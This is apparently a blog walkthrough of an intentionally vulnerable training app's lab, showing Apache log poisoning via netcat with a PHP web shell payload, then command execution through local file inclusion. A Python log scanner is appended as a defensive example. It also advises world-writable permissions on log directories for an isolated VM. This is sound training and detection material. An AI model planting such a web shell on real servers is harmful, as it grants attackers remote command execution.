Mutillidae — Lab 21 — Web Shell with Local File Inclusion (LFI)

Daniel Schwarzentraub
Oct 1, 2022

This lab can be found via: Labs > Insecure Direct Object Reference (IDOR) > Lab 21 — Web Shell with Local File Inclusion (LFI)

We need to verify we can access /var/log/apache2/access.log

If no data comes back, this is due to an apache2 config that closes a path traversal vulnerability in an updated version of Apache. All we need to do is modify the config (make sure you keep this instance isolated from the internet).

If we cat out /var/log/apache2/mutillidae-error.log, we will see the problem.

To resolve this, we will run chmod 777 -R /var/log/apache2

Typically you'd never want to do this, but in our case, since it's an isolated VM, it's OK.

Now, if we try again, we will have data

Now back to the lab:

We will open a terminal session and netcat to mutillidae on port 80, then press enter to give us a new line

Now we will type in the following command (since it is not a well-formed HTTP request it will error out, but it will still be written to the log directory):

<?php echo passthru(escapeshellcmd($_REQUEST['cmd'])); ?>

Now we can verify that LFI works by browsing to the same location and adding &cmd=id to see if the command runs successfully.

As for the answer to the lab, if we re-run the netcat session, and then replace the command in the URL with pwd instead of id, we will find our file location

(webpwnized might have his mutillidae instance within /var/www, and not in /html)

Answer: /var/www/mutillidae
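From the defender's side, both halves of this lab leave traces in the same access log: the request line that carries a PHP open tag, and the later request whose parameter points back at the log file. The following Python sketch is an added example, not part of the original lab or of Mutillidae; the sample log lines, the addresses and the page parameter name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache combined log format: host ident user [time] "request" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(.*?)" (\d{3}) ')
PHP_TAG = re.compile(r'<\?(php|=)', re.I)   # PHP open tag written into the log
LOG_REF = re.compile(r'/var/log/|\.\./')    # value pointing at a log dir or traversing

def classify(line):
    """Return finding labels for one access-log line (empty list = nothing flagged)."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparsed"]
    request, findings = m.group(2), []
    if PHP_TAG.search(unquote(request)):
        findings.append("php-in-request")
    parts = request.split(" ")
    if len(parts) >= 2:
        try:
            query = urlsplit(parts[1]).query
        except ValueError:          # malformed target, nothing to parse
            query = ""
        # parse_qsl percent-decodes values, so %2Fvar%2Flog is caught too
        for name, value in parse_qsl(query, keep_blank_values=True):
            if LOG_REF.search(value):
                findings.append("log-include:" + name)
    return findings

def scan(lines):
    """Return (line_number, client, findings) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = classify(line)
        if found:
            hits.append((n, line.split(" ", 1)[0], found))
    return hits

# Constructed sample lines (addresses, timestamps and the `page` parameter are made up).
SAMPLE = [
    '192.0.2.10 - - [01/Oct/2022:10:00:01 +0000] "GET /mutillidae/index.php?page=home.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.66 - - [01/Oct/2022:10:02:13 +0000] "<?php echo passthru(escapeshellcmd($_REQUEST[\'cmd\'])); ?>" 400 483 "-" "-"',
    '192.0.2.66 - - [01/Oct/2022:10:03:40 +0000] "GET /mutillidae/index.php?page=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9000 "-" "curl/7.85.0"',
    '192.0.2.66 - - [01/Oct/2022:10:04:02 +0000] "GET /mutillidae/index.php?page=..%2F..%2Fvar%2Flog%2Fapache2%2Faccess.log HTTP/1.1" 200 9000 "-" "curl/7.85.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A php-in-request hit followed by a log-include hit from the same client is the sequence this lab produces, so correlating the two by client address is more useful than alerting on either alone.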
